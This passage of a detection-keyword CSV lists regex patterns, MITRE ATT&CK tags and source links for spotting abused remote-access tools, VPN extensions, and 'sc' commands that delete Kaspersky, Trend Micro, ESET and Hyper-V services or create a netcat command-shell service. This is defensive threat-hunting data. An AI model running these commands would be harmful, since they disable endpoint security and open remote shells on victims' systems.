- TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" 
"*\RustDesk.lnk*",".{0,1000}\\RustDesk\.lnk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\RustDesk\query*",".{0,1000}\\RustDesk\\query.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","named pipe","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\RustDeskIddDriver\*",".{0,1000}\\RustDeskIddDriver\\.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\test_rustdesk.log*",".{0,1000}\\test_rustdesk\.log.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*095e73fc4b115afd77e39a9389ff1eff6bdbff7a*",".{0,1000}095e73fc4b115afd77e39a9389ff1eff6bdbff7a.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - 
TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*HKEY_CLASSES_ROOT\rustdesk*",".{0,1000}HKEY_CLASSES_ROOT\\rustdesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*info@rustdesk.com*",".{0,1000}info\@rustdesk\.com.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","#email","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*name=""RustDesk Service""*",".{0,1000}name\=\""RustDesk\sService\"".{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rs-ny.rustdesk.com*",".{0,1000}rs\-ny\.rustdesk\.com.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","network request after 
installation","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RuntimeBroker_rustdesk.exe*",".{0,1000}RuntimeBroker_rustdesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RustDesk Service is running*",".{0,1000}RustDesk\sService\sis\srunning.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rustdesk-*.apk*",".{0,1000}rustdesk\-.{0,1000}\.apk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rustdesk-*.deb*",".{0,1000}rustdesk\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rustdesk-*.dmg*",".{0,1000}rustdesk\-.{0,1000}\.dmg.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software 
abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rustdesk-*.rpm*",".{0,1000}rustdesk\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rustdesk-*-win7-install.exe*",".{0,1000}rustdesk\-.{0,1000}\-win7\-install\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RustDesk.exe *",".{0,1000}RustDesk\.exe\s.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RUSTDESK.EXE-*.pf*",".{0,1000}RUSTDESK\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered 
Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RustDesk_hwcodec.*",".{0,1000}RustDesk_hwcodec\..{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RustDesk_install.bat*",".{0,1000}RustDesk_install\.bat.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rustdesk_portable.exe*",".{0,1000}rustdesk_portable\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RustDesk_rCURRENT.log*",".{0,1000}RustDesk_rCURRENT\.log.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" 
"*RustDesk_uninstall.bat*",".{0,1000}RustDesk_uninstall\.bat.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RustDeskIddDriver.cer*",".{0,1000}RustDeskIddDriver\.cer.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*RustDeskIddDriver.dll*",".{0,1000}RustDeskIddDriver\.dll.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*rustdesk-portable-packer.exe*",".{0,1000}rustdesk\-portable\-packer\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*sc start RustDesk*",".{0,1000}sc\sstart\sRustDesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - 
TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*sc stop RustDesk*",".{0,1000}sc\sstop\sRustDesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*hipncndjamdcmphkgngojegjblibadbe*",".{0,1000}hipncndjamdcmphkgngojegjblibadbe.{0,1000}","greyware_tool_keyword","RusVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*cocfojppfigjeefejbpfmedgjbpchcng*",".{0,1000}cocfojppfigjeefejbpfmedgjbpchcng.{0,1000}","greyware_tool_keyword","SaferVPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*net rpc group members 'Domain Users' -W *",".{0,1000}net\srpc\sgroup\smembers\s\'Domain\sUsers\'\s\-W\s.{0,1000}","greyware_tool_keyword","samba","The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. 
It is used by attackers to find users list","T1087.002 - T1003.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "* /c sc query WinDefend*",".{0,1000}\s\/c\ssc\squery\sWinDefend.{0,1000}","greyware_tool_keyword","sc","Get information about Windows Defender service","T1518.001 - T1049","TA0007 - TA0009","N/A","Snatch","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*dnefedniw eteled cs*",".{0,1000}dnefedniw\s\seteled\scs.{0,1000}","greyware_tool_keyword","sc","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","Snatch","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1435","303","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*echo start > \\.\pipe\winreg*",".{0,1000}echo\sstart\s\>\s\\\\\.\\pipe\\winreg.{0,1000}","greyware_tool_keyword","sc","start the RemoteRegistry service without Admin privileges","T1569.002","TA0004 ","N/A","Snatch","Defense Evasion","https://twitter.com/splinter_code/status/1715876413474025704","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A" "*sc config KeyIso start= Disabled | sc stop KeyIso*",".{0,1000}sc\sconfig\sKeyIso\sstart\=\sDisabled\s\|\ssc\sstop\sKeyIso.{0,1000}","greyware_tool_keyword","sc","disables and stops the KeyIso service (CNG Key Isolation) potentially interfering with cryptographic functions on the system","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L3","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*sc create *nc.exe 
-*cmd.exe*",".{0,1000}sc\screate\s.{0,1000}nc\.exe\s\-.{0,1000}cmd\.exe.{0,1000}","greyware_tool_keyword","sc","create service with netcat","T1569.002 - T1059.003 - T1021.006","TA0004 - TA0002 - TA0011","N/A","Snatch","Persistence","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*sc delete ""AVP18.0.0""*",".{0,1000}sc\sdelete\s\""AVP18\.0\.0\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""ekrn""*",".{0,1000}sc\sdelete\s\""ekrn\"".{0,1000}","greyware_tool_keyword","sc","deletes the ESET service","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""FirebirdGuardianDefaultInstance""*",".{0,1000}sc\sdelete\s\""FirebirdGuardianDefaultInstance\"".{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""FirebirdServerDefaultInstance""*",".{0,1000}sc\sdelete\s\""FirebirdServerDefaultInstance\"".{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""hvdswvc""*",".{0,1000}sc\sdelete\s\""hvdswvc\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related 
services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""klbackupdisk""*",".{0,1000}sc\sdelete\s\""klbackupdisk\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""klbackupflt""*",".{0,1000}sc\sdelete\s\""klbackupflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""klflt""*",".{0,1000}sc\sdelete\s\""klflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""klhk""*",".{0,1000}sc\sdelete\s\""klhk\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""KLIF""*",".{0,1000}sc\sdelete\s\""KLIF\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete 
""klim6""*",".{0,1000}sc\sdelete\s\""klim6\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""klkbdflt""*",".{0,1000}sc\sdelete\s\""klkbdflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""klmouflt""*",".{0,1000}sc\sdelete\s\""klmouflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""klpd""*",".{0,1000}sc\sdelete\s\""klpd\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""kltap""*",".{0,1000}sc\sdelete\s\""kltap\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""KSDE1.0.0""*",".{0,1000}sc\sdelete\s\""KSDE1\.0\.0\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""ntrtscan""*",".{0,1000}sc\sdelete\s\""ntrtscan\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""nvspwmi""*",".{0,1000}sc\sdelete\s\""nvspwmi\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""ofcservice""*",".{0,1000}sc\sdelete\s\""ofcservice\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""storflt""*",".{0,1000}sc\sdelete\s\""storflt\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""TmCCSF""*",".{0,1000}sc\sdelete\s\""TmCCSF\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""TmFilter""*",".{0,1000}sc\sdelete\s\""TmFilter\"".{0,1000}","greyware_tool_keyword","sc","delete 
Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""TMiCRCScanService""*",".{0,1000}sc\sdelete\s\""TMiCRCScanService\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""tmlisten""*",".{0,1000}sc\sdelete\s\""tmlisten\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""TMLWCSService""*",".{0,1000}sc\sdelete\s\""TMLWCSService\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""TmPreFilter""*",".{0,1000}sc\sdelete\s\""TmPreFilter\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""TmProxy""*",".{0,1000}sc\sdelete\s\""TmProxy\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete 
""TMSmartRelayService""*",".{0,1000}sc\sdelete\s\""TMSmartRelayService\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""tmusa""*",".{0,1000}sc\sdelete\s\""tmusa\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""vmicguestinterface""*",".{0,1000}sc\sdelete\s\""vmicguestinterface\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""vmicheartbeat""*",".{0,1000}sc\sdelete\s\""vmicheartbeat\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""vmickvpexchange""*",".{0,1000}sc\sdelete\s\""vmickvpexchange\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""vmicrdv""*",".{0,1000}sc\sdelete\s\""vmicrdv\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense 
